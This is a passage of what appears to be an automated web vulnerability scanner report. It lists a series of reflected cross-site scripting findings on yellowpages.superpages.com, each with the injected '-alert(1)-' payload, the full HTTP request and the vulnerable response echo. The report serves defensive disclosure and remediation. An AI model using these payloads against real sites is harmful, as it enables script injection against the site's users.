This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssf7342&quot;-alert(1)-&quot;107199becab/forms.css
Server: Unspecified
Set-Cookie: JSESSIONID=65C38E08AACFCA247496A1F49E6DB041; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssf7342"-alert(1)-"107199becab/forms.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.566. http://yellowpages.superpages.com/common/css/forms.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/forms.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/forms.cssf1c09&quot;-alert(1)-&quot;6f31add0046
Server: Unspecified
Set-Cookie: JSESSIONID=0B17752584FF1A2DC3811629C5253765; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:44 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/forms.cssf1c09"-alert(1)-"6f31add0046?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.567. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common3fdca"-alert(1)-"96068b15aaf/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common3fdca&quot;-alert(1)-&quot;96068b15aaf/css/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=0CB998F802310503F3DF642089016142; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common3fdca"-alert(1)-"96068b15aaf/css/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.568. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef7bf"-alert(1)-"eed6ae6e6f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssef7bf&quot;-alert(1)-&quot;eed6ae6e6f1/print.css
Server: Unspecified
Set-Cookie: JSESSIONID=BFEAD8CA936BB2E59BD56DAA6BF8F3D7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:07 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssef7bf"-alert(1)-"eed6ae6e6f1/print.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.569. http://yellowpages.superpages.com/common/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a006a"-alert(1)-"cbff4859ae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/print.cssa006a"-alert(1)-"cbff4859ae5 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/print.cssa006a&quot;-alert(1)-&quot;cbff4859ae5
Server: Unspecified
Set-Cookie: JSESSIONID=7112A7C7D0BF2A8F8F9AF1A7F814C733; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/print.cssa006a"-alert(1)-"cbff4859ae5?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.570. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1ff"-alert(1)-"dc2efa902dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonda1ff&quot;-alert(1)-&quot;dc2efa902dc/css/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=4239D7C1884951A967FFE5B24D2C2BFE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:21 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonda1ff"-alert(1)-"dc2efa902dc/css/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.571. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95a34"-alert(1)-"686e302e816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css95a34"-alert(1)-"686e302e816/reset.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css95a34&quot;-alert(1)-&quot;686e302e816/reset.css
Server: Unspecified
Set-Cookie: JSESSIONID=7716BE18718FF0A9D0724AA014CD1180; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css95a34"-alert(1)-"686e302e816/reset.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.572. http://yellowpages.superpages.com/common/css/reset.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/reset.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aabb"-alert(1)-"23c3bf4d12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/reset.css3aabb"-alert(1)-"23c3bf4d12 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/reset.css3aabb&quot;-alert(1)-&quot;23c3bf4d12
Server: Unspecified
Set-Cookie: JSESSIONID=1ECBA4F29730F93048865C6330D8702E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/reset.css3aabb"-alert(1)-"23c3bf4d12?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.573. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad15d"-alert(1)-"4cb99c62a1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonad15d&quot;-alert(1)-&quot;4cb99c62a1b/css/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=98569611A90DDF545C63EF46782C91CF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc75f4&quot;-alert(1)-&quot;02b021d68ca/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=961E21ED8472E86EF4F8EBD9ECEB24D4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:24 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sendtom.cssec1e7&quot;-alert(1)-&quot;03bc909001e
Server: Unspecified
Set-Cookie: JSESSIONID=89100A70CAE7838057FA2B0BF2BD7136; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:30 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond0c20&quot;-alert(1)-&quot;e4243f6ac8f/css/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=AC90724B3D6058EB845DA1C9B8F4C038; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:43 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/csse8cb3&quot;-alert(1)-&quot;ad160d53bf0/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=A653C00D1D509E4F913800C0855B5E3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:53 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spcore.css4fc04&quot;-alert(1)-&quot;230ea56f1b4
Server: Unspecified
Set-Cookie: JSESSIONID=F118099836FFFF9E6242ECE63F34CE56; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:00 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
